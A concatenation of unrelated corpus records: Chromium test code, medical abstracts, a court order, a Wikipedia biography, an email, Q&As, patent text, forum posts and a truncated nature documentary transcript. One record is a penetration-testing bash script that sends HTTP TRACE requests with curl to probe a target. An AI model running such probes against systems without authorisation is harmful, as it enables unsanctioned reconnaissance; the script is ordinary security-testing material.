+ " document.getElementById('div').firstChild, "
+ " 'composition', 0)")));
Assert.assertEquals(0x0000000L,
(long) Double.parseDouble(
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerBackgroundColorForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition', 1)")));
Assert.assertEquals(0x00000000L,
(long) Double.parseDouble(
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerUnderlineColorForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition', 0)")));
Assert.assertEquals(0x00000000L,
(long) Double.parseDouble(
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerUnderlineColorForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition', 1)")));
Assert.assertEquals("0",
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerRangeForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition', 0).startOffset"));
Assert.assertEquals("5",
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerRangeForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition', 0).endOffset"));
Assert.assertEquals("6",
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerRangeForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition', 1).startOffset"));
Assert.assertEquals("11",
JavaScriptUtils.executeJavaScriptAndWaitForResult(webContents,
"internals.markerRangeForNode("
+ " document.getElementById('div').firstChild, "
+ " 'composition', 1).endOffset"));
}
@Test
@SmallTest
@Feature({"TextInput"})
public void testAutocorrectAttribute() throws Exception {
// Autocorrect should be on for a text field that doesn't have an autocorrect attribute.
mRule.focusElement("input_text");
Assert.assertEquals(EditorInfo.TYPE_TEXT_FLAG_AUTO_CORRECT,
mRule.getConnectionFactory().getOutAttrs().inputType
& EditorInfo.TYPE_TEXT_FLAG_AUTO_CORRECT);
// Autocorrect should be on for a text field that has autocorrect="on" set.
mRule.focusElement("autocorrect_on");
Assert.assertEquals(EditorInfo.TYPE_TEXT_FLAG_AUTO_CORRECT,
mRule.getConnectionFactory().getOutAttrs().inputType
& EditorInfo.TYPE_TEXT_FLAG_AUTO_CORRECT);
// Autocorrect should be off for a text field that has autocorrect="off" set.
mRule.focusElement("autocorrect_off");
Assert.assertEquals(0,
mRule.getConnectionFactory().getOutAttrs().inputType
& EditorInfo.TYPE_TEXT_FLAG_AUTO_CORRECT);
}
}
|
{
"pile_set_name": "Github"
}
|
The intramandibular gland of leaf-cutting ants (Atta sexdens rubropilosa Forel 1908).
The eusociality developed in Hymenoptera and Isoptera is driven by an efficient interaction between exocrine glands and jointed appendages, both in close interaction with the environment. In this context, the mandible of ants plays an important role, since, in addition to being the main jointed appendage, it possess glandular functions. As an example we might name the two glands associated with the mandible: the mandibular and the intramandibular glands. The intramandibular gland is found inside the mandible and consists of a hypertrophied secretory epithelium and secretory cells in the mandible's lumen. The secretion of the secretory epithelium is liberated through intracuticular ducts that open at the base of hairs at the mandible's surface. The secretion of the intramandibular gland (epithelium and secretory cells) reacted positively to tests for the detection of polysaccharides and proteins, thus suggesting that it consists of glycoproteins. The ultrastructure of the secretory epithelium presents variations related to the developmental stage of the individual, showing a large number of ribosomes and microvilli close to the cuticle in young individuals, while in the older specimens it was possible to note the formation of an intracellular reservoir. These variations of secretory epithelium, as also the interaction between the cellular groups inside the mandible, are important information about this gland in leaf-cutting ants.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
UNPUBLISHED
UNITED STATES COURT OF APPEALS
FOR THE FOURTH CIRCUIT
No. 06-7538
UNITED STATES OF AMERICA,
Plaintiff - Appellee,
versus
JOHN JERMAINE BECKHAM,
Defendant - Appellant.
Appeal from the United States District Court for the Western
District of North Carolina, at Charlotte. Graham C. Mullen, Senior
District Judge. (3:00-cr-00136-4; 3:06-cv-00292)
Submitted: December 14 2006 Decided: December 21, 2006
Before MICHAEL, GREGORY, and SHEDD, Circuit Judges.
Dismissed by unpublished per curiam opinion.
John Jermaine Beckham, Appellant Pro Se. Amy Elizabeth Ray, OFFICE
OF THE UNITED STATES ATTORNEY, Asheville, North Carolina, for
Appellee.
Unpublished opinions are not binding precedent in this circuit.
PER CURIAM:
John Jermaine Beckham seeks to appeal the district
court’s order denying his 28 U.S.C. § 2255 (2000) motion on the
ground that it was untimely filed. The order is not appealable
unless a circuit justice or judge issues a certificate of
appealability. 28 U.S.C. § 2253(c)(1) (2000). A certificate of
appealability will not issue absent “a substantial showing of the
denial of a constitutional right.” 28 U.S.C. § 2253(c)(2) (2000).
A prisoner satisfies this standard by demonstrating that reasonable
jurists would find that any assessment of the constitutional claims
by the district court is debatable or wrong and that any
dispositive procedural ruling by the district court is likewise
debatable. Miller-El v. Cockrell, 537 U.S. 322, 336-38 (2003);
Slack v. McDaniel, 529 U.S. 473, 484 (2000); Rose v. Lee, 252 F.3d
676, 683-84 (4th Cir. 2001). We have independently reviewed the
record and conclude that Beckham has not made the requisite
showing. Accordingly, we deny a certificate of appealability and
dismiss the appeal. We dispense with oral argument because the
facts and legal contentions are adequately presented in the
materials before the court and argument would not aid the
decisional process.
DISMISSED
- 2 -
|
{
"pile_set_name": "FreeLaw"
}
|
Ovarian morphology in oligomenorrhea.
An account is given of the ovarian histology on 38 patients complaining of oligomenorrhea. The majority of these patients, 22, had polycystic ovaries, but in 11 the ovaries were comparatively normal in appearance. In another 3 they were small and inactive. The remaining 2 cases had chromosomal anomalies. The polycystic ovaries could be divided into two groups, one showing little follicular activity, the other a great deal. The maturation of most follicles in all ovaries appeared to be restricted and antral follicles rarely grew beyond a diameter of 4-5 mm. It is suggested that this degree of maturation is related to a low tonic secretion of FSH. An excessive production of luteinized thecal cells was found around most antral follicles. Polycystic change in these ovaries is mainly due to the presence of many atretic follicles. Luteinized thecal cells persist after atresia and it is suggested that this may be the result of a tonic secretion of LH. The lack of preantral and antral follicles in one group of polycystic ovaries may indicate a prolongation of the atretic process. Ovulation occurs with considerable frequency in these women. The mechanism is obscure.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Andrey Budnik
Andrey Sergeyevich Budnik (; 2 February 1953 – 10 August 2018) was a Russian diplomat who was an Ambassador of Russia to Pakistan from 2009 until 2013.
After graduating from the Moscow State Institute of International Relations in 1975, Budnik joined the diplomatic corps in 1978.
From 1978-1984, Budnik was the Attaché, Third Secretary at the Soviet embassy in New Delhi. After returning to Moscow, Budnik returned to India in 1988 as First Secretary, Counsellor in the Soviet Embassy.
From 1995-1999 Budnik was the Consul-General of Russia in Mumbai. He returned to Moscow in 2000, where he gained the position of Deputy Director General of the Second Asian Department at the Russian Ministry of Foreign Affairs, and held it until his first ambassadorial appointment, which came on 30 September 2008, when he was appointed by Russian President Dmitry Medvedev as Ambassador of Russia to Pakistan. Budnik presented his Letters of Credence to Pakistani President Asif Ali Zardari on 5 January 2009.
Budnik holds the diplomatic rank of Ambassador Extraordinary and Plenipotentiary 2nd-class.
References
Category:1953 births
Category:2018 deaths
Category:Soviet diplomats
Category:Ambassadors of Russia to Pakistan
Category:Moscow State Institute of International Relations alumni
Category:Russian expatriates in Pakistan
|
{
"pile_set_name": "Wikipedia (en)"
}
|
- "Contains most of the Latin place names contained in the imprint field of pre-1801 books in the catalogs of the University of Chicago, Yale University, the Huntington Library, and Brigham Young University, together with their modern English (AACR2R form) equivalent"; Bibliographic Standards Committee, Rare Books and Manuscripts Section, Association of College and Research Libraries. See Also: the CERL Thesaurus and the Orbis Latinus (1909).
Database created by the Consortium for European Research Libraries (CERL) "contains forms of imprint places, imprint names, and personal names as found in material printed before the middle of the nineteenth century including variant spellings, forms in Latin and other languages, and fictitious names. The file has been created as a reference tool for bibliographers and scholars of the history of the book."
|
{
"pile_set_name": "Pile-CC"
}
|
Today, we face many challenges in our daily lives that demand the expenditure of valuable resources. These challenges are presented as part of an environment (e.g. noncomputing and/or computing environments) that is itself governed by a set of operating rules. In an ideal world, a person navigating through these environments would have the ability to change or re-define those rules to assist in disposing of encountered challenges. For every rule there is a sanction, a retribution, a reprimand, and in some cases a punishment which can be levied by a governing authority and/or environment operator for breaking or circumventing the environment rule. Some environments may not offer a sanction, reprimand, retribution, or punishment when a rule is broken, but rather may be structured that it is virtually impossible to circumvent or break an environment rule. Accordingly, on balance, most people when navigating in an environment try their best to adhere to the environment rules, or in the case where there is no risk for rule breaking, do not attempt to break or circumvent rules as the environment structure makes it difficult to break the environment rules. Even if one were to choose to break an environment rule, in most environments there are not mechanisms that allow for rule breaking that either mitigate or completely remove risk.
To stay competitive in a particular environment and to optimize the position in the environment by exploiting the predefined rules, rigorous physical and/or mental training, or the use of advanced tools may be required. However, for the non-scrupulous, the same maybe be achieved by circumventing and/or breaking the predefined rules. The rules may be broken, for example, through bribery, cheating, and deception. Such rule circumvention and/or breaking has allowed for some significant events in our society today. For example, some ventures, and even some governments can base their existence on the practice of breaking environment rules, or at the least circumventing the predefined environment rules to more quickly achieve a desired goal. Subscribing to social conventions, however, breaking rules is traditionally kept secret in fear of retaliation, reprimand, and rebuke from non-sanctioning parties. Considering the benefits that may be realized from circumventing and/or breaking predefined rules of an environment, if given the choice, most would to circumvent and/or break the environment predefined rules to assist them with their daily challenges.
Human nature dictates our need to achieve. This is apparent in the field of gaming. Gaming enthusiasts are willing to pay for the opportunity to have the ability to circumvent and/or break the predefined rules of the computer game. This is especially the case where the player has spent a significant amount of time and energy in overcoming various challenges within the game to reach the desired goal of completing the game, but is unable to overcome a particular posed challenge. In such a circumstance, the player will likely be willing to pay for the ability to overcome this posed challenge through the circumvention of a predefined rule that helps define the challenge. In recent years, gaming enthusiasts have enjoyed a number of action, action-adventure, adventure, and strategy games, such as, DOOM®, QUAKE®, AGE OF EMPIRES®, ULITMA ONLINE®, etc. The object of these games is to wage battle with various beings in an effort to win a war or improve your standing within the game and/or gaming community. These games are typically structured such that the player is given access to increasingly superior weaponry and/or skills as they advance through increasingly difficult game levels. In an ideal world, gamers would be able to have access to these superior weapons, or alternatively,
additional ammunition for their existing weaponry, and/or superior skills earlier in the gaming experience, thereby increasing the garners chances of completing computer game levels.
Current practices and conventions require garners to ferret through computer game reference information, such as computer game hint books and computer game hint Websites to find what are touted as credible and reliable hints that are advertised, if used, would help garners more easily play a computer game. A hint may provide information such as button combinations that would allow garners to circumvent and/or break the predefined rules of a computer game (e.g. obtain a superior weapon instantaneously without having to complete a game level or having to find it in the computer game environment). However, these practices place a significant burden on garners as they are required to spend their time and energy tracking these hints down. Also, there is no guarantee that the hint actually works as advertised. The gamer is thus exposed to the possibility of trying numerous hints before finding one that achieves the desired computer game predefined rule circumvention and/or rule breaking (e.g. obtaining a superior weapon). Moreover, there is a disconnect in the activities surrounding the actual playing of a computer game and incorporating a found hint in the game being played. That is, the hints are not integrated within the computer game environment and exist external to the computer game.
Moreover, currently, computer game developers are not afforded the ability to monetize the existing practice of rule circumvention. Typically, computer game developers invest significant resources, both labor and capital, to create a computer game having a specific set of rules (e.g. collect four bottles in a particular level and the game will advance the participating user to the next game level). In some instances, the computer game (or other computing environment) is configured such that the participating user is required to complete an entire level before advancing and are configured to only to perform a save at the beginning of a particular game level. Such game configuration, which is often the case, frustrates participating gamers as they are required to repeat a portion or more of a particular level each time the game is played. Such frustration leads gaming enthusiasts to search for rule circumvention techniques to avoid the games rigid configuration.
A more advantageous practice contemplates providing enhanced entertainment options for a computer game wherein a mechanism is offered to gaming developers for integration with in a computer game that offers the ability to garners to circumvent and/or break the predefined rules of the computer game while the game is being played. This practice further contemplates the ability to transact the instance in which the gamer accepts the offers provided by the mechanism while the game is being played. Such practice would eliminate the time and effort expenditure required by existing practices and protect the gamer from using faulty hints. Moreover, the enhanced entertainment option would provide interactive advertisements that are seamlessly integrated within the computer game allowing users to purchase products and/or services or receive desired information while the game is being played.
From the foregoing it can be appreciated that there exists a need for comprehensive systems and methods that offer computing environment operators the ability to monetize the circumvention of rules in the environment such that participants of an environment are allowed to circumvent environment rules using an integrated mechanism which is invoked through a transaction.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
OK.
-----Original Message-----
From: Prentice Sellers [mailto:psellers49@yahoo.com]
Sent: Friday, November 02, 2001 5:25 PM
To: jdasovic@enron.com
Subject: Stuff
I think I left my email open at home which means I
can't download it on Omnisky or Yahoo. So you can
email me at this address if you need to.
Will you get stuff for breakfast at Rainbow?
Eggs
Butter
Bread for toast
Jarly or cheddar
Porties or other mushrooms
Green onions
Don't buy any yellow onions - I will bring some from
home.
I love you.
|
{
"pile_set_name": "Enron Emails"
}
|
Q:
Synchronizing own tree list with GTK TreeView/TreeModel in Python
In my application, I have a class that manages my tree (in brief, is like a filesystem ,where the root contains folders, that contains folder, etc. and also contains files). The problem I have now is that I have duplicated lists, i. e. the class that manages the filesystem, and separately, the TreeView/TreeModel, where I must create the tree using the data. This is needed, because my class has a lot more of methods and properties than the properties shown in the tree. For example, now, when I delete a file, I update my internal tree, and also have to remove the item from the TreeModel.
Is it possible to tell the TreeModel/TreeView to use my own class? Of course, I asume that I will have to modify the class that manages my tree, but what I would like to have is that when I add a file to a folder in my class, it would be automatically added to the TreeView, the same that when I remove it, or modify its name or properties.
Using Python 2.7.12, Ubuntu 16.04, Gtk3 (gi.repository, glade, etc.)
A:
You can have your class implement the TreeModel interface, and use it directly as the model, without having to synchronize between two classes at all!
Have your class extend Gtk.TreeModel, and implement its virtual methods.
|
{
"pile_set_name": "StackExchange"
}
|
RChain Chart
Make the most of your RChain investments
Use advanced RChain charts to analyse the RHOC price and maximise your opportunities when trading RChain.
Improve your trading strategy with advanced charts.
Use advanced charts to maximise your opportunities when buying and selling RChain. Track patterns and trends to better
understand the movements in the price of RChain and the direction of cryptocurrency markets. Draw your own trend lines,
position trackers and use advanced indicators such as; moving averages, fibonacci retracements, and relative strength
indexes to refine your RChain trade and investment strategy.
|
{
"pile_set_name": "Pile-CC"
}
|
Inkjet printers and other electronic printing devices have become ubiquitous in society. These printing devices can utilize a slotted substrate to deliver ink in the printing process. Such printing devices can provide many desirable characteristics at an affordable price. However, the desire for ever more features at ever-lower prices continues to press manufacturers to improve efficiencies.
One way of meeting consumer demands is by improving the slotted substrates that are incorporated into print head dies, fluid ejecting devices, printers, and other printing devices. Currently, the slotted substrates can have a propensity to crack and ultimately break. Cracking of the substrate and ultimately the print head die increases production costs as a result of lower yields and decreases product reliability.
Accordingly, the present invention arose out of a desire to provide slotted substrates having desirable characteristics.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
My husband was a vibrant, hardworking man. He loved life, people and above his family. It started with a back pain and no one could define the cause. a Cat scan was given their finding, a large tumor on his right kidney. The surgery was scheduled two months later and he had started loosing weight.Surgery was done, removal of kidney and a very large tumor. We thought that this was the end of cancer. There were lesions discovered in the lungs and liver. They were never diagnosed as Cancer, he remained very ill, loosing weight, no income, since he was self employed. Some family members were not supportive, because they did not believe us that we did not know.Constant office and hospital vistis. My husband died in the summer, mainly of a broken heart from his family and poor diagnosis from his physician. Now I am a grieving widow, who misses her soulmate and wonder, why he could not have helped.
It has been ten months since I became a widow. You find yourself doing alot of things alone. you prepare for one person, go to church alone and events that you and your husband would do. How do you cope with this and not feel so uncomfortable. Also, coming to your home at night alone, what do you do?
Grief is hard and grief is healthy too. It will be a year in July. There are days, I can cope with my loss and there are days, I am a wet mess. Loosing my husband is like have an arm amputated without any meds.
It's nomal to feel a lot of "what ifs" or guilt about what one or others "should have" or "should not have" done. I felt some of that when my wife died of cancer, after many years of illness and my caregiving. At the Well Spouse Association forum, http://wellspouse.org/forums[wellspouse.org] former well spouses write about their situations... all different, but similarities as well. Check it out.
I am very sorry for your loss. My husband died from a rare cancer called a liposarcoma. We had never heard of it when he was diagnosed, and we had to go to Houston for treatment we were happy with. My experience with cancer is that it can bring out the best in people and it can also bring out the worst. Sometimes, these people's actions hurt more than the cancer. Always remember you loved your husband, and he died knowing that. That's the most important thing. Are you finding any support? It's important that you do. The best advice I heard after Jay died was from another sarcoma widow. She told me to be gentle on myself. I am now passing that advice on to you. May God bless you.
For the celebrating of my husband's homegoing, one year this month,Family and friends across the US did some random act of kindness in his honor. Because my husband was such a giving person, he would have done those things any way, if he were here. For example, his nephews helped elderly couples with their grocery, one paid for a family to go to the movies, songs were dedicated on you-tube. I could go on and on, it was a great and kind gesture to help us cope with our lost.
My husband died of Retroproneal Liposarcoma,a rare cancer.
he had two operations,clinical trials at Sloan Kettering,standard treatment of chemotherapy,nothing helped,complication after complication,and Sloan Kettering had no more answers,no more treatment advice,He was a fighter and believed in them.
We had to go to Dr Linchitz,in glen cove long island ,to help my husband get strong enough,to survive his second operation,low dose chemotherapy and poly v vitamin infusion ,all weed him another year of life.... But this disease came back and took him from us so fast ,we did not even know he was dying. He was at peace and did not suffer,always had him on pain meds,Ativan to keep him relaxed and still hope until time was taken from him so fast
My daughters and I miss him so much and the pain will not go away.
We would of taken of him for the rest his life,because in between all his complications he had quality days and was always at comfort and with us always. May he rest in peace and watch over us now.May he live in our Hearts forever.
I miss my husband every day,it has been two months since he died of Liposaroma,a rare cancer and no clinical trial worked,two surgeries and cancer came back so fast....... It does not feel real. I talk to him everyday.
Quick Links
Site Help
Caring.com is a leading online destination for caregivers seeking information and support as they care for aging parents, spouses, and other loved ones. We offer thousands of original articles, helpful tools, advice from more than 50 leading experts, a community of caregivers, and a comprehensive directory of caregiving services.
|
{
"pile_set_name": "Pile-CC"
}
|
#!/bin/bash
# This file is part of PenTestKit
# Copyright (C) 2017-2018 @maldevel
# https://github.com/maldevel/PenTestKit
#
# PenTestKit - Useful tools for Penetration Testing.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For more see the file 'LICENSE' for copying permission.
# e.g. $1 == proxy (http://127.0.0.1:8080)
# e.g. $2 == target url
if [ $# -eq 1 ]; then
curl -i -I -X TRACE --insecure "$1"
else
echo "Please provide a target host."
fi
|
{
"pile_set_name": "Github"
}
|
[Lipoprotein oxidation in the blood of women with pregnancy complications].
The level of lipoprotein oxidation in blood sera of pregnant women with obstetrical abnormalities is studied. Lipid peroxides were measured by a modified thiobarbituric acid test. The level of lipoprotein oxidation was increased, which may be one of the pathogenetic mechanisms of vascular disease in fetoplacental insufficiency and gestosis.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Q:
How would I highlight invalid input fields onChange?
I wanted to know how I would highlight invalid input fields onChange? Currently my form only checks to see whether an input field meets minimal requirements such as length, and that is fine, but I would like to have the invalid field in question highlighted with a border. If the field is then validated, onChange, it should go back to its normal state.
$(document).ready(function() {
$('form #response2').hide();
$('.button2').click(function(e) {
e.preventDefault();
var valid = '';
var required = ' is required';
var first = $('form #first').val();
var last = $('form #last').val();
var email = $('form #email').val();
var tempt = $('form #tempt').val();
var tempt2 = $('form #tempt2').val();
if (first = '' || first.length <= 1) {
valid += '<p>Your first name' + required + '</p>';
}
if (last = '' || last.length <= 1) {
valid += '<p>Your last name' + required + '</p>';
}
if (!email.match(/^([a-z0-9._-]+@[a-z0-9._-]+\.[a-z]{2,4}$)/i)) {
valid += '<p>Your e-mail address' + required + '</p>';
}
if (tempt != 'http://') {
valid += '<p>We can\'t allow spam bots.</p>';
}
if (tempt2 != '') {
valid += '<p>A human user' + required + '</p>';
}
if (valid != '') {
$('form #response2').removeClass().addClass('error2')
.html('' +valid).fadeIn('fast');
}
else {
$('form #response2').removeClass().addClass('processing2').html('<p style="top:0px; left:0px; text-align:center; line-height:1.5em;">Please wait while we process your information...</p>').fadeIn('fast');
var formData = $('form').serialize();
submitForm(formData);
}
});
});
A:
Here is the code you can use.
$(document).ready(function(){
$('input[type="text"]').keyup(function(){
var value = $(this).val();
if(value=='' || value.length<=1) {
$(this).css('border','1px solid red');
}
else {
$(this).css('border','none');
}
});
});
This code will highlight all input text fields on the form when you it is empty or with only one character. This code triggers with the keyboard key up event means when you press and release the key, key up event will be fired and this code will be executed. Hope it helps.
|
{
"pile_set_name": "StackExchange"
}
|
Q:
Issue with databinding to class?
I'm having an issue with databinding a textblock to a custom prop inside another class, what am I doing wrong?
mainpage:
public partial class MainPage : PhoneApplicationPage
{
// Constructor
public MainPage()
{
InitializeComponent();
InitializeLanguage();
}
private void InitializeLanguage()
{
LanguageHelper lh = new LanguageHelper();
// this.TitlePanel.DataContext = lh;
txtTitle.DataContext = lh;
}
}
databinding:
<TextBlock x:Name="txtTitle"
Text="{Binding homepage_subheading}"
Style="{StaticResource PhoneTextNormalStyle}"
Foreground="White"
Margin="12,0"/>
LanguageHelper class:
public class LanguageHelper
{
public String homepage_subheading;
public void changeLanguage()
{
if (true)
{
//english
homepage_subheading = "This is the top / sub Heading";
}
}
}
A:
You don't have a property but a public field, and the databinding engine only works on properties.
So you need to change your class:
public String homepage_subheading { get; set; }
If you want to also notify the UI with your changes of your properties your LanguageHelper should implement the INotifyPropertyChanged interface and fire the PropertyChange event when you modify your properties.
|
{
"pile_set_name": "StackExchange"
}
|
More Articles police & fire
comment
WESTCHESTER COUNTY, N.Y. - Westchester County Police officers tracked down a pair of suspects who allegedly attacked a man in Mount Kisco before fleeing from the scene.
Shortly before 4:20 a.m. on Sunday, Oct. 9, police received a report from a caller who said that he was attacked on South Moger Avenue by two men who took off in a white Honda sedan after stealing $50 from him.
Police said they pursued the two men - later identified as 27-year-old Jorge Gregorio Vanegas and 27-year-old Selvin Sanchez Soto - who were arrested and taken into custody.
The two men were each charged with felony counts of first-degree robbery and third-degree assault. They are due back in court later this year to answer the charges.
|
{
"pile_set_name": "Pile-CC"
}
|
lacP1 promoter with an extended -10 motif. Pleiotropic effects of cyclic AMP protein at different steps of transcription initiation.
The cyclic AMP receptor protein (CRP), which activates transcription from the wild-type lacP1 promoter and most of its mutants, represses productive RNA synthesis from a lacP1 promoter variant that contains an extended -10 element, although CRP enhances RNA polymerase binding as well as open complex formation in both promoters. Moreover, abortive RNA synthesis, which is already higher in the extended -10 variant compared with the parent promoter, was further enhanced by CRP. These results, together with the observed decrease in productive RNA synthesis, indicate that CRP, while facilitating the earlier steps of initiation, inhibits transcription from the extended -10 lacP1 by hindering promoter clearance. We propose that CRP decreases energetic barriers to RNA polymerase binding, isomerization, and abortive RNA synthesis but stabilizes the abortive RNA initiating complex, which results in increasing the activation energy of the transition state before the elongation complex. The results demonstrate for the first time that a DNA-binding regulatory protein acts as an activator or a repressor in different steps of the transcription initiation pathway because of the energetic differences of the intermediate complex in the same promoter.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
**Session:** 68. Novel Antimicrobials and Approaches Against Resistant Bugs
*Thursday, October 3, 2019: 12:15 PM*
|
{
"pile_set_name": "PubMed Central"
}
|
"DAVID ATTENBOROUGH:" "The Cape of Good Hope, on Africa's southerly tip." "Here, two great seas meet." "One, the warm Indian Ocean, the other, the chilly Atlantic." "And as they mingle, so they create a billowing cloak that drapes the summit of Table Mountain." "Spectacular though this is, the mountain's cloudy covering is only a hint of the profound influence that these two very different oceans have on the fortunes of life here." "(WAVES CRASHING)" "And not just here at the Cape, but across the length and breadth of southern Africa." "Two thousand miles north from the Cape, beneath this sandy beach, new life is stirring." "(SCURRYING)" "Hundreds of baby green turtles emerge like a torrent from the safety of their nest." "Each one, just seven centimetres long, must make a 100-metre sprint down the beach." "From the moment they hatch, they're driven by an instinctive urge to run to the sea." "Few creatures start life with the odds for success so heavily stacked against them." "Yellow-billed kites." "Pied crows." "(SQUAWKING)" "But so many of these hatchlings appear together that predators can't catch them all." "Last out, this baby might seem doomed." "But struggling out late could just give her a chance." "(CROWS CAWING)" "The crows seem insatiable." "Even those that reach the sea aren't safe." "This female has to make a dash for it." "She's still in danger, and not just from above." "A ghost crab may be smaller than the hatchling, but it has the strength to drag her into its lair." "Not this time." "At last, the sea." "(WAVES LAPPING)" "She has to catch a breath if she's not to drown." "But the pounding waves make it desperately difficult." "(WAVES CRASHING)" "Beyond the surf, calmer water." "But even here, the hatchling is not out of danger." "She dives." "Just in time." "Only one hatchling in a thousand will survive to adulthood." "But if she does, she may live for 80 years." "For now, the ocean is there to be explored." "As the hatchling disappears into the deep blue, she swims into the waters of one the planet's most powerful currents, the Agulhas." "The Agulhas sweeps south towards the Cape, transporting 100 billion gallons of warm water every day." "These tropical seas are so warm, they evaporate on an enormous scale." "Water vapour rises until, at altitude, it cools and condenses into clouds." "As the clouds drift inland, they bring rain to one of the least explored corners of our planet, the mountains of Mozambique." "(THUNDER RUMBLING)" "This the wettest place in southern Africa." "Decades of civil war have kept travellers away from this little-known land." "It was satellite mapping that revealed the full extent of the forest that grows here." "So now it's known to outsiders as the Google rainforest." "(BIRDS CHIRPING)" "It could also be called the butterfly forest." "After the rains, butterflies have emerged together in huge numbers." "As soon as their wings dry out, they will take to the air." "Their goal, to find a mate." "But how?" "There may be thousands close by, but the foliage is so thick it's difficult for them to find each other." "(BIRDS TWITTERING)" "They have a remarkable solution." "They follow rivers upstream and travel to higher ground." "The journey can take hours of determined flying." "Eventually they emerge into the only open space there is." "The treeless peak of Mount Mabu." "Up here, free from the confines of the forest, they hold a butterfly ball." "Now, the butterflies have all the space they need for their aerobatic courtship." "The male's strategy is simple, fly higher and faster than the competition and just maybe you'll win a virgin female." "This spectacular gathering, unseen by outsiders until now, happens for just half an hour each morning and for just a few weeks in the year." "Once mated, the females descend back to the rainforest to lay their eggs." "A forest that only exists because of moisture rising from the warm Agulhas current hundreds of miles away in the Indian Ocean." "The rainwater now flows southwards from Mozambique's highest peaks to the lowlands of the eastern Cape." "And where the land flattens, rivers slow, creating a vast swamp 50 miles across." "This is Gorongosa." "Here, all kinds of creatures come to catch fish." "(WATER BUBBLING)" "(SQUAWKING)" "Whiskered catfish work as a team." "They take a gulp of air at the surface and then belch it out underwater to create a net of bubbles," "and that traps little fish." "There are fish for everyone." "And each species has its own technique for catching them." "(SQUAWKING)" "It's all very well having a big beak but you've still got to know how to use it." "This young pelican has a lot to learn, and not long to do so." "(SQUAWKING)" "Maybe, like the catfish, teamwork is the answer." "It's certainly working for the flock, and this pelican seems to be getting the hang of it." "But surely it can't swallow that catfish." "Trying to was a mistake." "(CROWS CAWING)" "The rainwater, briefly held in Gorongosa's swamp, has now been enriched with silt and sand." "All down this coast, sediment-laden rivers, the Zambezi, the Limpopo, the Save, drain back to the sea," "and there they meet the Agulhas Current." "And what happens to all that sand?" "Over the millennia, the Agulhas has worked it into a complex underwater landscape." "This vast sand sculpture is the Bazaruto Archipelago, the oldest of its kind in the world." "It may look like paradise but living here is not easy." "(WAVES ROARING)" "For 100,000 years the Agulhas Current has battered these submerged dunes with underwater sandstorms." "But, where the water is deep enough to escape these storms, nutrients carried from Africa's interior fuel an explosion of life." "A rare oceanic hunter rules here." "Giant kingfish." "As big as a man and, weight for weight, one of the most powerful fish in the sea." "Despite their size, they're extraordinarily agile when hunting." "Normally, kingfish are solitary, but for just a few weeks each year, they gather at places like Bazaruto and prepare for an extraordinary journey," "one that will take them far inland." "The Mtentu River." "The king of the kingfish leads them upstream." "As they travel further into freshwater, they seem to change from aggressive hunters into dedicated pilgrims." "Now, many miles from their natural home, and in response to an unknown cue, they stop and begin to circle." "Other marine fish that migrate upriver usually do so in order to breed, but there's no evidence that these kingfish spawn up here." "Neither do they hunt." "So, what are they doing?" "In truth, the purpose of this strange behaviour is still unknown." "Within a few weeks, they will retrace their journey back to the ocean." "The lives of kingfish, like those of turtles, and butterflies, and pelicans, are influenced by the Agulhas Current." "But that influence can only reach so far." "And this is why." "The Drakensberg mountains." "Here, local people say that the vultures soar so high they can see into the future." "These sheer cliffs, rising to over 3, 000 metres, hold back the advancing rain clouds, and as a result, the land beyond them is starved of water." "This is the greatest expanse of sand in the world, a seemingly endless desert that is the vast, parched centre of Southern Africa." "Thousands of miles to the west, where this desert meets the Atlantic Ocean, another current prevails." "But the Benguela Current, surging up the west side of Africa, has a very different character." "(SEALS BARKING)" "It's extremely cold, full of nutrients, and it's thronged with life." "A great white shark." "They can raise their body temperature to 10 degrees above that of the surrounding sea." "But doing so requires an enormous amount of high-grade fuel." "So this is a great bonanza for them." "The body of a dead whale." "The carcass will draw in every great white for miles around." "And here, off Cape Town, that means a lot of sharks." "Instead of feeding in a frenzy, these sharks have rather refined table manners." "They swim side by side to get the measure of each other, then each takes its turn." "This female is the biggest so she eats first." "The next only feeds when she gives way." "The waters of the Benguela are so rich, they support more great white sharks than any other seas on the planet." "(WAVES CRASHING)" "And they are so cold, they attract some surprising creatures to these African shores." "(PENGUINS WARBLING)" "Penguins." "African penguins." "This female is returning to relieve her partner." "Of course, there's no ice here, but these rocks can be almost as slippery." "(WARBLING CONTINUES)" "But there are more serious obstacles than the slippery rocks awaiting them." "It's his turn to feed, so he leaves her to look after their eggs." "Now, she must tackle a problem faced by no other kind of penguin." "For the next 10 days, she must protect her eggs from the African sun." "A dense coat of feathers that keeps her warm in cold seas now stifles her." "On these exposed rocks, she must shade her eggs instead of keeping them warm." "Everything here seems the wrong way round." "For some, the soaring temperature is too much." "A neighbour deserts his nest." "His egg will not survive." "He's not the only one to give up." "Some years, not a single chick is reared." "Penguins are adapted to withstand temperatures of 40 degrees below zero, not 40 degrees above." "(PENGUIN CHICK PEEPING)" "Now, at the hottest part of the day, the very worst time, her chicks are hatching." "Just when they need her most, she's reaching the limit of her endurance." "After 10 days of intensive fishing, the chick's father comes back to take his turn at the nest." "But will he be too late?" "(CHICKS PEEPING)" "(FEMALE PENGUIN BLEATING)" "He greets his 